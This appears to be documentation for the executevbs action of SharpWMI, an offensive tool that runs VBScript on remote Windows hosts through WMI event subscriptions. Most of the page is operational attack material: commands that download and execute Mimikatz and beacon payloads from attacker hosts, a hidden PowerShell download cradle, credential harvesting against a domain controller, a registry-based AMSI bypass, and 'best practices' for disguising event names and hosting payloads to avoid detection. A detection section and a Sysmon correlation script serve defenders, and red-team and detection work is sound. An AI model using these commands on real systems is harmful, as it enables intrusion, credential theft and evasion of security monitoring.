Overview

The executevbs action executes VBScript payloads through WMI event subscriptions using ActiveScriptEventConsumer. This provides a flexible method for remote code execution with support for downloading scripts, executing commands, and delayed triggers.
This action creates WMI event subscriptions that persist until cleaned up. SharpWMI automatically removes artifacts after execution, but failed operations may leave traces.

Syntax

SharpWMI.exe action=executevbs [computername=HOST[,HOST2,...]] [script-specification] [eventname=NAME] [amsi=disable] [trigger=SECONDS] [timeout=SECONDS] [username=DOMAIN\user] [password=Password]

Parameters

Parameter     Required  Description
action        Yes       Must be executevbs
computername  No        Target host(s), comma-separated
eventname     No        Name for the WMI event subscription. Default: "Debug"
trigger       No        Seconds before the script executes. Default: 10
timeout       No        Script kill timeout in seconds. Default: 12
amsi          No        Set to disable to bypass AMSI
username      No        Username for authentication
password      No        Password for authentication

Script Specification Methods

SharpWMI offers 8 different methods to specify VBScript payloads:

Method A: Execute Command via VBScript

Execute an OS command through a preset VBScript template:
SharpWMI.exe action=executevbs computername=target.domain.com command="notepad.exe" eventname="Update"
The VBScript template:
Set wmi = GetObject("winmgmts:{impersonationLevel=impersonate}!\\" & computer & "\root\cimv2")
Set proc = GetObject("winmgmts:root\cimv2:Win32_Process")
proc.Create "COMMAND", Null, conf, intProcessID

Method B: Download PowerShell Script and Execute

Download a PowerShell script from a URL and feed it to PowerShell via stdin:
SharpWMI.exe action=executevbs computername=target.domain.com url="http://attacker.com/Invoke-Mimikatz.ps1" eventname="Update"
The VBScript downloads the script and pipes it to PowerShell’s stdin.

Method C: Download Binary and Execute

Download binary, save to disk, and execute:
SharpWMI.exe action=executevbs computername=target.domain.com url="http://attacker.com/beacon.exe,%TEMP%\update.exe" eventname="Update"
Format: url="SOURCE_URL,TARGET_PATH"

Method D: Download Binary and Execute Custom Command

Download binary and execute with custom parameters:
SharpWMI.exe action=executevbs computername=target.domain.com url="http://attacker.com/payload.exe,%TEMP%\svc.exe" command="%TEMP%\svc.exe -c 192.168.1.100" eventname="Update"

Method E: Execute VBScript from File

Read VBScript from file and execute:
SharpWMI.exe action=executevbs computername=target.domain.com script="C:\payloads\script.vbs" eventname="Update"

Method F: Execute Inline VBScript

Execute VBScript code directly:
SharpWMI.exe action=executevbs computername=target.domain.com script="CreateObject(\"WScript.Shell\").Run(\"notepad.exe\")" eventname="Update"

Method G: Execute Base64-Encoded VBScript

Base64-decode and execute VBScript:
SharpWMI.exe action=executevbs computername=target.domain.com scriptb64="Q3JlYXRlT2JqZWN0KCJXU2NyaXB0LlNoZWxsIikuUnVuKCJub3RlcGFkLmV4ZSIp" eventname="Update"

Method H: Execute Base64-Encoded Script from File

Read base64-encoded VBScript from file:
SharpWMI.exe action=executevbs computername=target.domain.com scriptb64="C:\payloads\script.vbs.b64" eventname="Update"

Usage Examples

Basic VBScript Execution

SharpWMI.exe action=executevbs computername=target.domain.com command="notepad.exe" eventname="MyEvent"

Download and Execute Scenarios

SharpWMI.exe action=executevbs computername=target.domain.com url="http://192.168.1.100/Invoke-Mimikatz.ps1" eventname="WindowsUpdate" amsi=disable

Advanced VBScript Usage

SharpWMI.exe action=executevbs computername=target.domain.com script="CreateObject(\"WScript.Shell\").Run(\"cmd /c whoami > C:\temp\out.txt\")" eventname="Debug"

How It Works

  1. Create Timer Object: creates an __IntervalTimerInstruction that fires after the specified delay
  2. Create Event Filter: sets up an __EventFilter that matches the timer event
  3. Create Event Consumer: creates an ActiveScriptEventConsumer carrying the VBScript payload
  4. Bind Filter to Consumer: creates a __FilterToConsumerBinding that links filter and consumer
  5. Wait for Execution: waits for the trigger time (default 10 seconds)
  6. Cleanup: removes timer, filter, consumer, and binding

The execution flow:
  1. __IntervalTimerInstruction fires after trigger seconds
  2. __EventFilter matches the timer event
  3. ActiveScriptEventConsumer executes the VBScript
  4. The script runs with a KillTimeout of timeout seconds
  5. All WMI objects are deleted after execution

This leaves minimal artifacts compared to persistent WMI backdoors: the subscription objects are gone afterwards, although their creation is still recorded in the WMI-Activity and Sysmon logs listed under Detection Considerations.

Timing Parameters

Default timing:

# Default: trigger after 10 seconds, timeout after 12 seconds
SharpWMI.exe action=executevbs computername=target command="notepad.exe"

The script executes 10 seconds after the subscription is created.
timeout should always be greater than trigger so the script has time to run before it is killed.

Operational Scenarios

Scenario 1: Stealthy Beacon Deployment

# Download and execute beacon with delay
SharpWMI.exe action=executevbs computername=target.domain.com url="http://192.168.1.100/beacon.exe,%TEMP%\WindowsUpdate.exe" eventname="WindowsUpdate" trigger=30 timeout=40 amsi=disable username="DOMAIN\admin" password="Password123!"

Scenario 2: Credential Harvesting

# Download and execute Mimikatz
SharpWMI.exe action=executevbs computername=dc.domain.com url="http://192.168.1.100/Invoke-Mimikatz.ps1" eventname="SecurityUpdate" amsi=disable trigger=10 timeout=60

Scenario 3: Custom VBScript Payload

# Execute custom VBScript for lateral movement
$vbs = @'
Set objShell = CreateObject("WScript.Shell")
objShell.Run "powershell -nop -w hidden -c IEX(New-Object Net.WebClient).DownloadString('http://192.168.1.100/payload.ps1')"
'@

SharpWMI.exe action=executevbs computername=target.domain.com script="$vbs" eventname="Update" amsi=disable

Scenario 4: Multiple Target Execution

# Execute across multiple systems
SharpWMI.exe action=executevbs computername=ws01,ws02,ws03,ws04 url="http://192.168.1.100/script.ps1" eventname="Maintenance" amsi=disable trigger=5 timeout=15

Remote vs Local Usage

Local execution:

# Execute on localhost (rarely used)
SharpWMI.exe action=executevbs command="notepad.exe" eventname="Test"

Note: Local execution via WMI event subscriptions is uncommon. Use the exec action for local commands. For remote execution, specify computername as in the scenarios above.

AMSI Evasion

When amsi=disable is specified:
  1. Registry Modification: sets HKCU\Software\Microsoft\Windows Script\Settings\AmsiEnable to 0
  2. VBScript Execution: the VBScript runs with AMSI disabled
  3. Registry Restoration: the original AMSI value is restored after cleanup

SharpWMI.exe action=executevbs computername=target.domain.com url="http://attacker.com/script.ps1" eventname="Update" amsi=disable

Detection Considerations

WMI event subscriptions are a high-fidelity indicator of malicious activity and are heavily monitored.

WMI-Activity event log:
  • Event ID 5858: WMI permanent event subscription
  • Event ID 5859: WMI event filter activity
  • Event ID 5861: WMI event consumer registration
Sysmon:
  • Sysmon Event ID 19: WMI event filter activity
  • Sysmon Event ID 20: WMI event consumer activity
  • Sysmon Event ID 21: WMI event consumer to filter binding
Process creation:
  • wscript.exe or cscript.exe spawned by scrcons.exe
  • Parent process: scrcons.exe (Script Event Consumer)
  • Event ID 4688: Process creation with suspicious parent
WMI objects:
  • ActiveScriptEventConsumer with encoded scripts
  • WMI queries to root\subscription namespace
  • Creation of __EventFilter, ActiveScriptEventConsumer, __FilterToConsumerBinding
Network:
  • Multiple WMI connections in succession
  • DCOM traffic patterns consistent with WMI operations
Registry:
  • Registry modification to AmsiEnable key
  • Event ID 4657: Registry value modification
  • Temporary AMSI bypass in user context
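A defender-side correlation of the Sysmon 19/20/21 records listed above, added here as an example and not part of SharpWMI or this page: it joins constructed filter, consumer and binding records on their names and flags bindings that pair an ActiveScriptEventConsumer with a timer-driven filter or with script indicators. The field names and sample values are assumptions modelled on Sysmon's fields, not real captures.

```python
import re

# Constructed records modelled loosely on Sysmon event IDs 19 (filter), 20 (consumer) and
# 21 (binding); not real captures. SharpWMI's executevbs binds a timer filter to a script consumer.
SAMPLE_EVENTS = [
    {"EventID": 19, "Name": "Debug",
     "Query": "SELECT * FROM __TimerEvent WHERE TimerID = 'Debug'"},
    {"EventID": 20, "Name": "Debug",
     "Destination": 'Set sh = CreateObject("WScript.Shell")\r\n'
                    'sh.Run "powershell -nop -w hidden -c IEX(...)"'},
    {"EventID": 21, "Consumer": 'ActiveScriptEventConsumer.Name="Debug"',
     "Filter": '__EventFilter.Name="Debug"'},
    # Built-in SCM subscription (NTEventLogEventConsumer) that must not be flagged.
    {"EventID": 19, "Name": "SCM Event Log Filter",
     "Query": "select * from MSFT_SCMEventLogEvent"},
    {"EventID": 20, "Name": "SCM Event Log Consumer", "Destination": ""},
    {"EventID": 21, "Consumer": 'NTEventLogEventConsumer.Name="SCM Event Log Consumer"',
     "Filter": '__EventFilter.Name="SCM Event Log Filter"'},
]

TIMER_FILTER = re.compile(r"__TimerEvent|__IntervalTimerInstruction", re.I)
SCRIPT_INDICATORS = re.compile(
    r"WScript\.Shell|Win32_Process|powershell|DownloadString|XMLHTTP|-w hidden", re.I)
REF = re.compile(r'^(?P<cls>\w+)\.Name="(?P<name>[^"]*)"$')

def split_ref(ref):
    """'ActiveScriptEventConsumer.Name="Debug"' -> ('ActiveScriptEventConsumer', 'Debug')."""
    m = REF.match(ref)
    return (m.group("cls"), m.group("name")) if m else ("", ref)

def correlate_bindings(events):
    """Join each binding (21) to its filter (19) and consumer (20) and score it."""
    filters = {e["Name"]: e for e in events if e["EventID"] == 19}
    consumers = {e["Name"]: e for e in events if e["EventID"] == 20}
    findings = []
    for e in (x for x in events if x["EventID"] == 21):
        ccls, cname = split_ref(e["Consumer"])
        fname = split_ref(e["Filter"])[1]
        reasons = []
        if ccls == "ActiveScriptEventConsumer":
            reasons.append("script consumer")
            script = consumers.get(cname, {}).get("Destination", "")
            hits = sorted({h.lower() for h in SCRIPT_INDICATORS.findall(script)})
            if hits:
                reasons.append("script contains " + ", ".join(hits))
        if TIMER_FILTER.search(filters.get(fname, {}).get("Query", "")):
            reasons.append("timer-driven filter (one-shot execution pattern)")
        if len(reasons) >= 2:  # consumer class alone is weak; require a second indicator
            findings.append({"filter": fname, "consumer": cname, "reasons": reasons})
    return findings
```

Feeding the same correlation with parsed Microsoft-Windows-WMI-Activity/Operational records instead of Sysmon ones only requires mapping their field names onto Name, Query, Destination, Consumer and Filter.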

Best Practices

Event Naming

  • Use legitimate-sounding event names
  • Avoid obvious names like “Backdoor” or “Shell”
  • Use Windows Update, Maintenance, Debug
  • Randomize names across operations

Timing Strategy

  • Use delays to avoid immediate detection
  • Allow time to disconnect before execution
  • Set appropriate timeout values
  • Don’t use excessively long delays

Payload Delivery

  • Use HTTPS for downloads when possible
  • Host payloads on legitimate-looking domains
  • Use URL shorteners or redirectors
  • Verify downloads with checksums in VBScript

Cleanup

  • Let SharpWMI handle automatic cleanup
  • Verify subscriptions are removed
  • Check for orphaned event consumers
  • Monitor for failed cleanup operations

Comparison with exec Action

Feature           executevbs                               exec
Execution Method  WMI event subscription                   Win32_Process.Create
Timing            Delayed (configurable)                   Immediate
Payload Type      VBScript                                 Command line
Artifacts         Event subscriptions                      Process creation
Complexity        Higher                                   Lower
Flexibility       Very high                                Moderate
Detection Risk    Higher (event subscriptions monitored)   Moderate
Use Case          Complex payloads, downloads              Simple commands

Troubleshooting

Cause: WMI permissions or service issue
Solution:
  • Verify the WMI service is running
  • Check admin privileges
  • Test with a local WMI query first
  • Verify root\cimv2 namespace access

Cause: Subscription namespace access denied
Solution:
  • Ensure admin rights on the target
  • Check root\subscription namespace permissions
  • Verify the WMI filter quota is not exceeded
  • Try a different event name

Cause: Timeout too short or script error
Solution:
  • Increase the timeout parameter
  • Test the VBScript locally first
  • Check for syntax errors
  • Verify URLs are accessible from the target

Cause: Insufficient privileges or EDR blocking
Solution:
  • Verify admin context
  • Check for EDR protecting the registry
  • Try an alternative AMSI bypass
  • Test the registry modification manually

Additional Resources

# List event filters
SharpWMI.exe action=query query="SELECT Name,Query FROM __EventFilter" namespace="root\subscription"

# List event consumers
SharpWMI.exe action=query query="SELECT Name,ScriptText FROM ActiveScriptEventConsumer" namespace="root\subscription"

# List bindings
SharpWMI.exe action=query query="SELECT Filter,Consumer FROM __FilterToConsumerBinding" namespace="root\subscription"

# Remove event filter
Get-WmiObject -Namespace root\subscription -Class __EventFilter -Filter "Name='EventName'" | Remove-WmiObject

# Remove event consumer
Get-WmiObject -Namespace root\subscription -Class ActiveScriptEventConsumer -Filter "Name='EventName'" | Remove-WmiObject

# Remove binding
Get-WmiObject -Namespace root\subscription -Class __FilterToConsumerBinding | Where-Object { $_.Filter -match 'EventName' } | Remove-WmiObject